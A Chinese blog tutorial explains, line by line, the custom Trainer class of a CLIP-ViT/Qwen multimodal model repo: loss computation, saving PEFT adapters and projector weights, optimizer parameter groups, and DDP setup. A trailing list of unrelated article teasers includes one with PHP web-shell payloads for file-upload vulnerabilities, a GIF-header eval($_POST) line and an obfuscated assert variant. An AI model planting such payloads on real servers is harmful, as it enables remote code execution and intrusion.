FlowerLoveJava

[CLIP-VIT-L + Qwen] 多模态大模型源码阅读 - trainer篇

前情提要
源码阅读
- 导包
- 逐行解读
- compute_loss方法（重构）
- - 整体含义
  - 逐行解读
- save_model函数（重构）
- - 整体含义
  - 逐行解读
- create_optimizer函数（重构）
- - 整体含义
  - 逐行解读
- create_optimizer_and_scheduler函数（重构）
- - 整体含义
  - 逐行解读

参考repo:WatchTower-Liu/VLM-learning; url: VLLM-BASE

前情提要

有关多模态大模型架构中的语言模型部分（MQwen.py）的代码请看（多模态大模型源码阅读 - 1、多模态大模型源码阅读 - 2，多模态大模型源码阅读 - 3，多模态大模型源码阅读 - 4）,多模态大模型架构中的视觉模型（visual/CLIP-VIT.py）部分请看多模态大模型源码阅读 - 5
本节主要讲的是项目中的多模态Trainer部分，即项目文件trainer.py，该文件中的代码重构了部分transfomers.trainer的成员方法，以适配多模态场景下的模型训练，包括自定义的损失计算，参数保存，优化器配置，支持分布式训练（多卡场景）。

源码阅读

导包

import torch
from transformers import Trainer
from transformers.trainer import (
    is_sagemaker_mp_enabled,
    get_parameter_names,
    has_length,
    ALL_LAYERNORM_LAYERS,
    logger,
)
import os
from peft import get_peft_model_state_dict

逐行解读

import torch
from transformers import Trainer

torch不必赘述，深度学习的核心出装，构建和训练神经网络的必备库，调包调参侠（我）的福音。
Trainer类主要用于NLP和多模态任务，简化模型训练过程，在后续的代码中作为父类使用。

from transformers.trainer import (
    is_sagemaker_mp_enabled,
    get_parameter_names,
    has_length,
    ALL_LAYERNORM_LAYERS,
    logger,
)

is_sagemaker_mp_enabled检验是否在Amazon SageMaker的模型并行环境中运行。模型并行性允许将模型的不同组件分布到多个GPU设备上，用以加速大规模模型的训练。如果是单卡童鞋就不必在意这个设置~
get_parameter_names用以获取模型中的参数名，在设置优化器参数时，可以区分需要权重衰减的参数和不需要的参数。
has_length检测对象是否有长度信息，用于确定训练过程的迭代次数。在项目代码中没有用到。
ALL_LAYERNORM_LAYERS：包含所有LAYERNORM类型的层，用于在优化器配置中排除这些层的权重衰减。
logger：日志记录，输出训练过程中信息和调试信息。

import os
from peft import get_peft_model_state_dict

os:经常使用的库，主要用来创建文件、文件夹，开关文件。
peft（Parameter-Efficient Fine-Tuning），用于高效微调模型，在微调过程中会冻结预训练模型的大部分参数，仅保留少量的可训练参数，以在尽可能少的资源占用和时间下微调模型适配下游任务，大名鼎鼎的LoRA、Prefix Tuning、Prompt Tuning 等都在这个库中。get_peft_model_state_dict用于获取微调后的adapter状态字典。例如使用LoRA对模型微调后，可以使用这一方法获取微调后的LoRA adapter状态字典。

compute_loss方法（重构）

class MultiModalTrainer(Trainer):
    def compute_loss(self, model, inputs, return_outputs=False):
        return model(
            image=inputs["images"],
            input_ids=inputs["input_ids"],
            labels=inputs["labels"],
        ).loss

整体含义

为多模态场景自定义的损失计算重构方法，以适配多模态形式的输入，如image

逐行解读

class MultiModalTrainer(Trainer):
    def compute_loss(self, model, inputs, return_outputs=False):

自定义MultiModelTrainer类，继承自transfomers.Trainer，拥有其成员变量和方法。
model:可以同时处理图片和文本类型输入
inputs：包含图片输入，文本索引输入和有监督训练需要的标签数据。
return_outputs：指示是否返回模型输出，考虑到这个项目是科研级代码，所以这个参数没啥用（QWQ）。

        return model(
            image=inputs["images"],
            input_ids=inputs["input_ids"],
            labels=inputs["labels"],
        ).loss

将inputs字典中的对应键下的值传递给model，获取其返回值中的损失值，用于后续的模型优化。

save_model函数（重构）

    def save_model(self, output_dir=None, _internal_call=False):
        from transformers.trainer import TRAINING_ARGS_NAME
        
        # Ensure output_dir is not None
        if output_dir is None:
            output_dir = self.args.output_dir
        
        # Create the output directory if it doesn't exist
        os.makedirs(output_dir, exist_ok=True)
        
        # Save training arguments
        torch.save(self.args, os.path.join(output_dir, TRAINING_ARGS_NAME))
        
        # Access the original model
        model = self.model.module if hasattr(self.model, 'module') else self.model
        
        # Save LLM parameters
        saved_params_LLM = get_peft_model_state_dict(model.LLM)
        torch.save(saved_params_LLM, os.path.join(output_dir, "adapter_model.bin"))
        
        # Save other parameters
        saved_params_other = model.feature_proj.state_dict()
        torch.save(saved_params_other, os.path.join(output_dir, "other_params.bin"))
        
        # Save configuration
        config = model.LLM.peft_config
        selected_adapters = list(config.keys())
        config[selected_adapters[0]].save_pretrained(output_dir, auto_mapping_dict=None)

整体含义

保存训练过程中的模型及其相关配置到指定的目录，重构后适配了多模态模型模型和配置

逐行解读

    def save_model(self, output_dir=None, _internal_call=False):
        from transformers.trainer import TRAINING_ARGS_NAME

output_dir指定模型和相关配置的保存目录，_internal_call并没有用上，可能与某些内部逻辑有关。
TRAINING_ARGS_NAME用于保存训练模型参数名，是一个常量。

        # Ensure output_dir is not None
        if output_dir is None:
            output_dir = self.args.output_dir
        
        # Create the output directory if it doesn't exist
        os.makedirs(output_dir, exist_ok=True)

如果没有指定模型配置的保存目录，就采用配置参数中的输出路径。同时使用os.makedirs方法在指定输出路径下穿件文件夹，exist_ok保证即使文件夹已经存在也不会报错。

        # Save training arguments
        torch.save(self.args, os.path.join(output_dir, TRAINING_ARGS_NAME))
        
        # Access the original model
        model = self.model.module if hasattr(self.model, 'module') else self.model

保存训练参数到指定文件夹的指定文件中，文件名为TRAINING_ARGS_NAME常量。如果模型被封装在DataParallel 或 DistributedDataParallel 中，通过self.model.module访问模型，否则直接使用self.model。

        # Save LLM parameters
        saved_params_LLM = get_peft_model_state_dict(model.LLM)
        torch.save(saved_params_LLM, os.path.join(output_dir, "adapter_model.bin"))

我们传入的model参数实际上是一个以Qwen为语言模型，SIGLIP/CLIP-VIT为视觉模型的多模态模型参数，所有这里的model.LLM大概率是语言模型，saved_params_llm获取语言模型微调后的adapter状态字典，并将其存储到输出路径下的adapter_model.bin文件中。

        # Save other parameters
        saved_params_other = model.feature_proj.state_dict()
        torch.save(saved_params_other, os.path.join(output_dir, "other_params.bin"))

这段代码用于将多模态模型的中间投影层参数存储到other_params.bin文件中，这里的中间投影层可以参考llava的相关论文，用于将视觉模型的输出映射到语言模型的向量空间，大概如下图所示。

projectionW就是中间投影层，也是整个多模态项目的核心出装。

        # Save configuration
        config = model.LLM.peft_config
        selected_adapters = list(config.keys())
        config[selected_adapters[0]].save_pretrained(output_dir, auto_mapping_dict=None)

peft_config方法获取peftmodel微调需要的参数配置。例如使用LoRA进行微调，config会包含所有必要的参数。config参数包含了adapter的类型、参数和设置。selected_keys获取参数字典中的所有键并将其转换为列表。save_pretrained将选择的适配器参数中的第一个存储到指定目录下，设置自动映射为None。

create_optimizer函数（重构）

    def create_optimizer(self):
        if is_sagemaker_mp_enabled():
            return super().create_optimizer()

        opt_model = self.model

        if self.optimizer is None:
            decay_parameters = get_parameter_names(opt_model, ALL_LAYERNORM_LAYERS)
            decay_parameters = [name for name in decay_parameters if "bias" not in name]
            if self.args.feature_proj_lr is not None:
                projector_parameters = [name for name, _ in opt_model.named_parameters() if "feature_proj" in name]
                optimizer_grouped_parameters = [
                    {
                        "params": [
                            p for n, p in opt_model.named_parameters() if (n in decay_parameters and n not in projector_parameters and p.requires_grad)
                        ],
                        "weight_decay": self.args.weight_decay,
                    },
                    {
                        "params": [
                            p for n, p in opt_model.named_parameters() if (n not in decay_parameters and n not in projector_parameters and p.requires_grad)
                        ],
                        "weight_decay": 0.0,
                    },
                    {
                        "params": [
                            p for n, p in opt_model.named_parameters() if (n in decay_parameters and n in projector_parameters and p.requires_grad)
                        ],
                        "weight_decay": self.args.weight_decay,
                        "lr": self.args.feature_proj_lr,
                    },
                    {
                        "params": [
                            p for n, p in opt_model.named_parameters() if (n not in decay_parameters and n in projector_parameters and p.requires_grad)
                        ],
                        "weight_decay": 0.0,
                        "lr": self.args.feature_proj_lr,
                    },
                ]
            else:
                optimizer_grouped_parameters = [
                    {
                        "params": [
                            p for n, p in opt_model.named_parameters() if (n in decay_parameters and p.requires_grad)
                        ],
                        "weight_decay": self.args.weight_decay,
                    },
                    {
                        "params": [
                            p for n, p in opt_model.named_parameters() if (n not in decay_parameters and p.requires_grad)
                        ],
                        "weight_decay": 0.0,
                    },
                ]

            optimizer_cls, optimizer_kwargs = Trainer.get_optimizer_cls_and_kwargs(self.args)

            self.optimizer = optimizer_cls(optimizer_grouped_parameters, **optimizer_kwargs)

        return self.optimizer

整体含义

创建模型优化器，并且对模型的不同部分采取不同的训练策略，例如权重衰减等，并返回一个自定义的优化器。

逐行解读

   def create_optimizer(self):
        if is_sagemaker_mp_enabled():
            return super().create_optimizer()

        opt_model = self.model

如果启用了模型并行，则调用父类的创建优化器方法，否则将成员变量self.model赋值给opt_model，后续将根据opt模型的参数属性创建自定义的优化器。

        if self.optimizer is None:
            decay_parameters = get_parameter_names(opt_model, ALL_LAYERNORM_LAYERS)
            decay_parameters = [name for name in decay_parameters if "bias" not in name]

如果成员变量optimizer为None，代表我们尚未创建一个优化器，进入代码内部。用get_parameter_names获取opt_model中所有LAYERNORM类型层的参数名，并去除掉名字中带有‘bias’（偏置）的参数，这是因为我们不对偏置项进行权重衰减。其余的参数在后续都将应用权重衰减。

            if self.args.feature_proj_lr is not None:
                projector_parameters = [name for name, _ in opt_model.named_parameters() if "feature_proj" in name]

如果设置了投影层的学习率，我们获取opt_model中所有名字里带有‘feature_proj’的参数，这些参数都是投影层参数，代表我们的模型是多模态模型，具有投影层。

                optimizer_grouped_parameters = [
                    {
                        "params": [
                            p for n, p in opt_model.named_parameters() if (n in decay_parameters and n not in projector_parameters and p.requires_grad)
                        ],
                        "weight_decay": self.args.weight_decay,
                    },
                    {
                        "params": [
                            p for n, p in opt_model.named_parameters() if (n not in decay_parameters and n not in projector_parameters and p.requires_grad)
                        ],
                        "weight_decay": 0.0,
                    },
                    {
                        "params": [
                            p for n, p in opt_model.named_parameters() if (n in decay_parameters and n in projector_parameters and p.requires_grad)
                        ],
                        "weight_decay": self.args.weight_decay,
                        "lr": self.args.feature_proj_lr,
                    },
                    {
                        "params": [
                            p for n, p in opt_model.named_parameters() if (n not in decay_parameters and n in projector_parameters and p.requires_grad)
                        ],
                        "weight_decay": 0.0,
                        "lr": self.args.feature_proj_lr,
                    },
                ]

初始化优化器参数组，列表中总共有四个字典，我们逐一来看（看着唬人，其实简单QAQ）。
第一个字典：‘params’键对应于不是投影层参数的所有权重衰减参数；‘weight_dacay’键对应配置参数中的权重衰减值，代表对这些参数应用权重衰减。
第二个字典：‘params’键对应于不是投影层参数的所有权重衰减参数；‘weight_dacay’键的值为0，代表不应用权重衰减。
第三个字典：‘params’键对应于投影层参数的所有权重衰减参数；‘weight_dacay’键对应配置参数中的权重衰减值，“lr”(学习率)为配置参数中的学习率值，代表应用权重衰减，并且初始化学习率。
第四个字典：‘params’键对应于投影层参数的所有权重衰减参数；‘weight_dacay’键的值为0，“lr”(学习率)为配置参数中的学习率值，代表不应用权重衰减，并且初始化学习率。
总而言之，对于非投影层的权重衰减参数，一组应用权重衰减，一组不应用权重衰减。这里的权重衰减参数是如何选出的参考上一段代码。对于投影层的权重衰减参数，一组应用权重衰减，一组不应用权重衰减，并且都有初始的学习率。

            else:
                optimizer_grouped_parameters = [
                    {
                        "params": [
                            p for n, p in opt_model.named_parameters() if (n in decay_parameters and p.requires_grad)
                        ],
                        "weight_decay": self.args.weight_decay,
                    },
                    {
                        "params": [
                            p for n, p in opt_model.named_parameters() if (n not in decay_parameters and p.requires_grad)
                        ],
                        "weight_decay": 0.0,
                    },
                ]

与上一段代码相反，这里是不应用投影层的情况。参考上一段代码中的非投影层权重衰减参数的配置即可，同样是一组运用权重衰减，一组不应用权重衰减。

            optimizer_cls, optimizer_kwargs = Trainer.get_optimizer_cls_and_kwargs(self.args)

            self.optimizer = optimizer_cls(optimizer_grouped_parameters, **optimizer_kwargs)

        return self.optimizer

使用父类的get_optimizer_cls_and_kwargs方法获取优化器类和优化器参数，传递入配置参数。用之前代码定义的优化器参数组和优化器参数初始化优化器实例，并返回。

create_optimizer_and_scheduler函数（重构）

    def create_optimizer_and_scheduler(self, num_training_steps: int):
        super().create_optimizer_and_scheduler(num_training_steps)
        if self.args.local_rank != -1:
            self.model = torch.nn.parallel.DistributedDataParallel(
                self.model,
                device_ids=[self.args.local_rank],
                output_device=self.args.local_rank,
                find_unused_parameters=True
            )

整体含义

这段代码主要用于分布式训练，让模型能够在多个GPU上并行计算。

逐行解读

    def create_optimizer_and_scheduler(self, num_training_steps: int):
        super().create_optimizer_and_scheduler(num_training_steps)

根据传入的训练迭代次数调用父类的create_optimizer_and_scheduler函数。子类在父类的功能上进行拓展。

        if self.args.local_rank != -1:
            self.model = torch.nn.parallel.DistributedDataParallel(
                self.model,
                device_ids=[self.args.local_rank],
                output_device=self.args.local_rank,
                find_unused_parameters=True
            )

如果local_rank为-1，代表不处于分布式训练环境中，反之local_rank指定了GPU的索引，调用torch.nn.parallel.DistributedDataParallel方法，创建DDP模型。DDP可以让模型进行分布式数据并行。其中self.model为模型实例，device_ids指定模型训练用的GPU编码，output_device指定模型输出的GPU编码，find_unused_parameters检查模型在前向传播后是否有未使用的参数。
至此，项目的Trainer.py源码讲解完毕。

stm32电机驱动模块想要成为糕手。 stm32 单片机嵌入式硬件
电机驱动模块是智能车等电子设备中用于驱动电机运转的重要部件，它能将微控制器输出的控制信号转换为足够的功率和电流来驱动电机。以下为你详细介绍电机驱动模块的相关信息：常见类型1.L298N电机驱动模块特点高电压、大电流驱动能力：能够驱动高达46V的电机，持续输出电流可达2A，瞬间峰值电流能达到3A，适用于驱动各种中小型直流电机。双通道控制：可以同时控制两个直流电机的正反转和调速，也能用于驱动一个步进电
实现能源高效利用、优化能源结构、降低碳排放的智慧能源开源了 AI服务老曹能源开源人工智能大数据自动化云计算
简介AI视频监控平台,是一款功能强大且简单易用的实时算法视频监控系统。愿景在最底层打通各大芯片厂商相互间的壁垒，省去繁琐重复的适配流程，实现芯片、算法、应用的全流程组合，减少企业级应用约95%的开发成本，用户仅需在界面上简单操作，即可实现全视频的接入及布控。基础项目搭建地址参考：yihecode-server:本项目基于ai场景而开发，提供算法模型管理、摄像头管理、告警管理、数据统计等功能。系统根
Python：基于Scapy的深度包分析与网络攻击防御方案 Lethehong Python在手 bug溜走！码农的快乐你不懂～python scapy syn dns
嗨，我是Lethehong！立志在坚不欲说，成功在久不在速欢迎关注：点赞⬆️留言收藏欢迎使用：小智初学计算机网页AI感谢这位博主提出的问题，如果在以后的文章中，大家有其他相关的问题，也可以积极的在评论区评论出来，博主我会的，我会积极的收纳问题，并及时的做出回应！目录1.环境准备2.基础流量捕获3.深度协议解析4.异常流量检测逻辑4.1SYNFlood检测4.2DNS放大攻击检测5.高级分析技术5.
DeepSeek对AI领域的变革性影响分析报告芝士AI吃鱼人工智能 DeepSeek OpenAI
一、引言近年来，人工智能（AI）技术加速演进，而中国开源大模型DeepSeek的崛起，标志着全球AI竞争进入新阶段。其凭借低成本、高性能、开源生态三大核心优势，迅速成为行业焦点。本报告从技术、产业、投资、就业及未来趋势等维度，全面解析DeepSeek对AI领域的深远影响，为集团战略布局提供参考。二、技术突破：算法效率与成本革命架构创新：MOE与MLA技术优化DeepSeek采用混合专家系统（MoE
DeepSeek对AI发展的范式革新与推动：研究报告芝士AI吃鱼 DeepSeek AI OpenAI LLM
DeepSeek对AI发展的范式革新与推动：研究报告一、技术范式的突破：从“算力堆砌”到“极致工程化”DeepSeek的成功标志着AI发展从依赖大规模算力投入向算法优化与工程效率的转变。其核心技术突破包括：低算力消耗的模型训练通过蒸馏训练策略、动态模型剪枝和稀疏训练，DeepSeek将训练成本降至OpenAI同类模型的1/10，同时保持性能可比甚至超越。例如，其训练成本仅558万美元，而OpenA
使用opencv实现深度学习的图片与视频的超分辨率人工智能研究所人工智能之计算机视觉 opencv 深度学习视频超分辨率图片超分辨率
图片超分辨率什么是视频与图片的超分辨率，总结一下便是给一张分辨率比较低的图片，进行超分辨率的处理后，生成比较清晰的高分辨率的图片，上图图片完美解释了超分辨率的过程，由于不同的算法不同，处理的结果也不相同，本期我们介绍一下如何进行图片的超分辨率的处理。·EDSR模型图像超分辨率EDSR：EnhancedDeepResidualNetworksforSingleImageSuper-Resolutio
Python之json模块的序列化和反序列化如梦@_@ python基础
序列化：可以理解为压缩反序列化：可以理解为解压Python中序列化和反序列化其实就是一个正反两个过程。序列化就是将Python对象转化为json格式，因为Python对象只有Python语言能够识别，如果想把数据发给Java代码写的程序，那么就识别不了，所以就有一个中间的格式：json，Java中也是一样，就是将Java的数据类型转换成json格式。反序列化就是，Python接收数据的应该是Pyt
python3安装mysql连接_Python3使用PyMySQL连接MySQL weixin_39814925
前提介绍：【功能实现】：1.登录本地MySQLServer创建数据库和表，Python3使用PyMySQL连接本地MySQL服务器，实现对数据库的表进行简单Insert操作。【软件配置】：1.MySQL服务器：MySQL8.0.202.Pymsql版本：Pymsql0.9.33.Python版本：Python34.NavicatforMySQL版本:Navicat115.PyCharm版本:PyC
阅读Android源码的一些姿势 weixin_34405332
2019独角兽企业重金招聘Python工程师标准>>>前面吐槽了有没有必要阅读Android源码，后面觉得只吐槽不太好，还是应该多少弄点干货。需要说明的是，Android每个系统版本的源码都会有变动，而且代码中时不时Java和Native互相穿插，追求完全看透源码意义不大，把目的定在“理解代码设计的思路，弄清各个生命周期方法调用的顺序”比较实际。日常开发中怎么阅读源码找到正确的源码IDE是日常经常
Android零基础入门第64节：揭开RecyclerView庐山真面目 weixin_33749242 移动开发 java python
2019独角兽企业重金招聘Python工程师标准>>>大家还记得之前在第38期~第50期都在学习列表控件吗，其中用了8期讲ListView的使用，相信都已经掌握好了吧。那么本期一起来学习Android5.X新增的一个列表组件，那就是RecyclerView的使用。一、RecyclerView概述从前面的学习我们知道，ListView的功能非常强大，几乎绝大部分应用程序都会使用到，虽然也学会一些方法
强化学习原理与代码实战案例讲解 AI天才研究院 AI大模型企业级应用开发实战 DeepSeek R1 &大数据AI人工智能大模型计算科学神经计算深度学习神经网络大数据人工智能大型语言模型 AI AGI LLM Java Python 架构设计 Agent RPA
1.背景介绍1.1什么是强化学习？强化学习（ReinforcementLearning,RL）是机器学习的一个重要分支，它关注的是智能体（Agent）如何在环境中通过与环境交互来学习最优的行为策略。与其他机器学习方法不同，强化学习并不依赖于预先标注的数据，而是通过试错的方式来学习。想象一下，你正在训练一只小狗学习坐下。你不会给它看成千上万张“坐下”的照片，而是会给它一些指令，比如“坐下”，如果它照
OpenCV 简介奇点创客 OpenCV
OpenCV（OpenSourceComputerVisionLibrary，开源计算机视觉库：http://opencv.org）是一个开放源代码库，其中包含数百种计算机视觉算法。本文档介绍所谓的OpenCV2.xAPI，与基于C的OpenCV1.xAPI相比，该API本质上是一套C++API（自OpenCV2.4发行以来，不推荐再使用CAPI，并且不使用“C”编译器进行测试）。OpenCV具有
OpenCV机器学习（1）人工神经网络 - 多层感知器类cv::ml::ANN_MLP 村北头的码农 OpenCV opencv 机器学习人工智能
操作系统：ubuntu22.04OpenCV版本：OpenCV4.9IDE:VisualStudioCode编程语言：C++11算法描述cv::ml::ANN_MLP是OpenCV库中的一部分，用于实现人工神经网络-多层感知器（ArtificialNeuralNetwork-Multi-LayerPerceptron,ANN-MLP）。它提供了一种方式来创建和训练多层感知器模型，以解决分类、回归等
文件上传漏洞常用payload Werqy3 web安全安全
[极客大挑战2019]UploadGIF89a@eval($_POST[1]);GIF89a$a="a"."s";$b="s"."e"."r"."t";$c=$a.$b;$c($_POST["1"]);
如何在Python中进行JSON数据的序列化和反序列化？计算机学长大白 python python 开发语言
在Python中，JSON（JavaScriptObjectNotation）是一种轻量级的数据交换格式，易于人阅读和编写，同时也易于机器解析和生成。Python内置的json模块提供了简单易用的方法来实现数据的序列化和反序列化。下面将详细介绍如何在Python中进行JSON数据的序列化和反序列化，并给出具体的示例。1.序列化序列化是指将Python对象转换为JSON格式的字符串。json模块提供
数字孪生的关键技术？云栖道人科技人工智能大数据重构
数字孪生的关键技术涵盖了多个前沿技术领域，这些技术共同作用，支持数字孪生系统的构建和运行。以下是主要的关键技术：1.物联网（IoT）与传感器技术物联网是数字孪生的基础，通过部署大量传感器，实时采集物理实体的各种数据（如温度、压力、振动、位置信息等）。这些数据被用于构建和更新数字孪生模型。IoT使物理世界中的设备和系统能够与其虚拟孪生进行数据交换，从而实现实时监控和管理。传感器数据采集：传感器负责物
Pytorch实现mnist手写数字识别 Zn要学习 python
>-**本文为[365天深度学习训练营]中的学习记录博客**>-**原作者：[K同学啊]**我的环境：语言环境：Python3.8编译器：JupyterLab深度学习环境：torch==1.12.1+cu113torchvision==0.13.1+cu113一、前期准备1.设置GPU如果设备上支持GPU就使用GPU,否则使用CPUimporttorchimporttorch.nnasnnimpo
《DeepSeek训练算法：开启高效学习的新大门》人工智能深度学习
在人工智能的浪潮中，大语言模型的发展日新月异。DeepSeek作为其中的佼佼者，凭借其独特的训练算法和高效的学习能力，吸引了众多目光。今天，就让我们深入探究DeepSeek训练算法的独特之处，以及它是如何保证模型实现高效学习的。一、独特的架构基础DeepSeek以Transformer架构为基石，但并非简单沿用，而是进行了深度创新。Transformer架构的核心是注意力机制，这让模型在处理序列数
python股票分析系统部署操作过程及代码实现大懒猫软件 python 开发语言 flask plotly api restful
部署一个股票分析系统涉及多个步骤，包括后端服务、前端界面和实时数据更新。以下是一个详细的部署过程，涵盖从代码编写到服务器部署的完整步骤。1.系统架构概述后端：使用Flask提供RESTfulAPI和数据处理服务。前端：使用PlotlyDash构建动态界面，实时显示股票价格走势。数据源：从金融数据API（如AlphaVantage、YahooFinance）获取实时数据。2.系统开发步骤2.1安装必
运用python制作一个完整的股票分析系统大懒猫软件 python 开发语言 django beautifulsoup
使用python制作一个股票分析系统，可以通过股票价格走势动态界面，实时动态监测不同类型股票的变化情况。以下是一个完整的股票分析系统开发指南，包括股票价格走势动态界面和实时监测功能。这个系统将结合网络爬虫、数据分析、机器学习和可视化技术，帮助你实时监测不同类型股票的变化情况。1.系统功能概述数据采集：使用网络爬虫技术从财经网站采集股票数据。数据处理：计算技术指标（如KDJ、BOLL）并进行数据预处
redis结合lua脚本解决多线程并发安全问题练川 redis lua redis
文章目录前言原子性单线程模型总结前言我们知道，多线程并发访问共享数据的时候，可能会造成并发安全问题，这是由于并发时多个线程相互穿插造成的问题；可以通过加锁，使得多个线程串行执行解决。当访问的是redis中的共享数据时，除了可以通过加锁解决，还可以使用lua脚本解决。本文针对redis结合lua脚本解决多线程并发安全问题，记录下个人的理解。原子性首先何为原子性？原子性是指操作不可分割，要么全部执行成
国内十大工业物联网平台分析报告(2025年) CServer_01 工业物联网工业物联网平台工业物联网平台选型物联网
目录1、工业物联网简介1.1、引言1.2、工业物联网平台架构1.3、工业物联网平台核心功能2、工业物联网发展趋势2.1、总体趋势2.2、技术趋势2.3、市场发展趋势2.4、应用趋势3、工业物联网平台市场预测3.1、工业物联网平台3.2、DCS3.3、实时数据库3.4、SCADA3.5、数字孪生3.6、设备全生命周期管理系统4、主要工业物联网平台供应商介绍4.1、蓝卓4.2、涂鸦智能4.3、中服云4
《探秘AI绿色计算：降低人工智能硬件能耗的热点技术》程序猿阿伟人工智能
在人工智能飞速发展的当下，其硬件能耗问题愈发凸显。据国际能源署预测，人工智能的能源消耗可能大幅增长。因此，降低人工智能硬件能耗，实现绿色计算，已成为行业关键课题。以下是一些正在崭露头角的热点技术。新型硬件架构与材料计算随机存取内存（CRAM）：明尼苏达大学的研究团队开发的CRAM，能让数据完全在内存阵列内处理，无需离开计算机存储信息的网格，打破了传统冯·诺依曼体系结构中计算与内存之间的壁垒，可将人
使用 Python 爬虫和 FFmpeg 爬取 B 站高清视频大懒猫软件 python 爬虫 ffmpeg
以下是一个完整的Python爬虫代码示例，用于爬取B站视频并使用FFmpeg合成高清视频。1.准备工作确保安装了以下Python库和工具：bash复制pipinstallrequestsmoviepy2.爬取视频和音频文件B站的视频和音频文件通常是分开存储的，需要分别下载视频和音频文件，然后使用FFmpeg合成。Python复制importrequestsfrommoviepy.editorimp
Google Cloud技术学习总结谭俊杰Jerry 人工智能
GoogleCloudPlatform（GCP）是由Google提供的一套云计算服务，帮助企业和开发者利用Google的基础设施来构建、部署和扩展应用程序。GCP提供了广泛的服务，涵盖计算、存储、数据分析、机器学习和网络等领域。以下是GoogleCloud的技术总结：核心服务计算服务GoogleComputeEngine：提供虚拟机（VM）实例，支持自定义配置，适合各种工作负载。GoogleKub
力扣乘积最大子数组孑么力扣算法 leetcode 职场和发展 java 动态规划贪心算法
动态规划，注意负负得正，dp交换。题目注意这里的dp的乘积要求最大，而两个很大的负数相乘也是大的，因此在每遍历到一个数时要存一个最大值的dp与一个最小值的dp，然后遍历完后再去存ans的dp。由于存在负数，那么会导致最大的变最小的，最小的变最大的。因此还需要维护当前最小值。时间复杂度：O(n)，空间复杂度：O(1)。classSolution{publicintmaxProduct(int[]nu
python爬虫模拟点击和输入,python爬虫实战--selenium模拟登录并自动点击半夜梳长长的头发 python爬虫模拟点击和输入
爬虫实战项目。爬虫利器：selenium的使用。任务介绍最近刚刚注册了某个网站：HDHome，该站有新手考核任务，其中有一项是需要达到魔力值5000。在魔力值获取方式中，我们看到这一项：“说谢谢=0.5个魔力值”，而网站存活种子数量达到16000+，也就意味着对每个种子说一下谢谢，轻松达到8000+的魔力值，于是，这个项目应运而生。实现思路：获取种子的页面，在每个页面中找到说谢谢的按钮，并点击后，
腾讯云目前支持4种DeepSeek开源大模型部署方案 szqcloud database
企业级的应用，光有大模型能力还不够，推理引擎以外，应用经验、各类原子化能力和现成的应用经验不可或缺。欢迎交流#deepseek腾讯云目前支持4种DeepSeek开源大模型部署方案1、面向开发者开箱即用的HAI方式1）参考：https://mp.weixin.qq.com/s/kZLPfXv3b1sxLSwyRVsEsg2）优势：支持R1，免除购买资源部署的过程，直接开箱使用；参数规模支持1.5B、
本地部署DeepSeek模型技术指南 Evaporator Core apache Doris 人工智能 deepseek
DeepSeek模型是一种先进的深度学习模型，广泛应用于自然语言处理、计算机视觉等领域。为了充分利用DeepSeek模型的强大功能，许多开发者和研究人员选择在本地环境中部署该模型。本文将详细介绍如何在本地环境中部署DeepSeek模型，包括环境准备、模型下载、配置、优化以及代码实现等内容。通过本文的指导，您将能够在本地成功部署并运行DeepSeek模型。1.环境准备在部署DeepSeek模型之前，
AI大模型应用开发实践：3.使用 tiktoken 计算 token 数量 Hugo_Hoo AI大模型应用开发人工智能 AI编程 agi
使用tiktoken计算token数量tiktoken是OpenAI开发的一种BPE分词器。给定一段文本字符串（例如，"tiktokenisgreat!"）和一种编码方式（例如，"cl100k_base"），分词器可以将文本字符串切分成一系列的token（例如，["t","ik","token","is","great","!"]）。将文本字符串切分成token非常有用，因为GPT模型看到的文本就
HQL之投影查询归来朝歌 HQL Hibernate 查询语句投影查询
在HQL查询中，常常面临这样一个场景，对于多表查询，是要将一个表的对象查出来还是要只需要每个表中的几个字段，最后放在一起显示？针对上面的场景，如果需要将一个对象查出来： HQL语句写“from 对象”即可 Session session = HibernateUtil.openSession();
Spring整合redis bylijinnan redis
pom.xml <dependencies>  <dependency> <groupId>org.springframework.data</groupId> <artifactId>spring-data-redi
org.hibernate.NonUniqueResultException: query did not return a unique result: 2 0624chenhong Hibernate
参考：http://blog.csdn.net/qingfeilee/article/details/7052736 org.hibernate.NonUniqueResultException: query did not return a unique result: 2 在项目中出现了org.hiber
android动画效果不懂事的小屁孩 android动画
前几天弄alertdialog和popupwindow的时候，用到了android的动画效果，今天专门研究了一下关于android的动画效果，列出来，方便以后使用。 Android 平台提供了两类动画。一类是Tween动画，就是对场景里的对象不断的进行图像变化来产生动画效果（旋转、平移、放缩和渐变）。第二类就是 Frame动画，即顺序的播放事先做好的图像，与gif图片原理类似。
js delete 删除机理以及它的内存泄露问题的解决方案换个号韩国红果果 JavaScript
delete删除属性时只是解除了属性与对象的绑定，故当属性值为一个对象时，删除时会造成内存泄露（其实还未删除）举例： var person={name:{firstname:'bob'}} var p=person.name delete person.name p.firstname -->'bob' // 依然可以访问p.firstname，存在内存泄露
Oracle将零干预分析加入网络即服务计划蓝儿唯美 oracle
由Oracle通信技术部门主导的演示项目并没有在本月较早前法国南斯举行的行业集团TM论坛大会中获得嘉奖。但是，Oracle通信官员解雇致力于打造一个支持零干预分配和编制功能的网络即服务（NaaS）平台，帮助企业以更灵活和更适合云的方式实现通信服务提供商（CSP）的连接产品。这个Oracle主导的项目属于TM Forum Live!活动上展示的Catalyst计划的19个项目之一。Catalyst计
spring学习——springmvc（二） a-john springMVC
Spring MVC提供了非常方便的文件上传功能。 1，配置Spring支持文件上传： DispatcherServlet本身并不知道如何处理multipart的表单数据，需要一个multipart解析器把POST请求的multipart数据中抽取出来，这样DispatcherServlet就能将其传递给我们的控制器了。为了在Spring中注册multipart解析器，需要声明一个实现了Mul
POJ-2828-Buy Tickets aijuans ACM_POJ
POJ-2828-Buy Tickets http://poj.org/problem?id=2828 线段树，逆序插入 #include<iostream>#include<cstdio>#include<cstring>#include<cstdlib>using namespace std;#define N 200010struct
Java Ant build.xml详解 asia007 build.xml
1,什么是antant是构建工具2,什么是构建概念到处可查到，形象来说，你要把代码从某个地方拿来，编译，再拷贝到某个地方去等等操作，当然不仅与此，但是主要用来干这个3,ant的好处跨平台 --因为ant是使用java实现的，所以它跨平台使用简单--与ant的兄弟make比起来语法清晰--同样是和make相比功能强大--ant能做的事情很多，可能你用了很久，你仍然不知道它能有
android按钮监听器的四种技术百合不是茶 android xml配置监听器实现接口
android开发中经常会用到各种各样的监听器,android监听器的写法与java又有不同的地方; 1,activity中使用内部类实现接口 ,创建内部类实例使用add方法与java类似创建监听器的实例 myLis lis = new myLis(); 使用add方法给按钮添加监听器
软件架构师不等同于资深程序员 bijian1013 程序员架构师架构设计
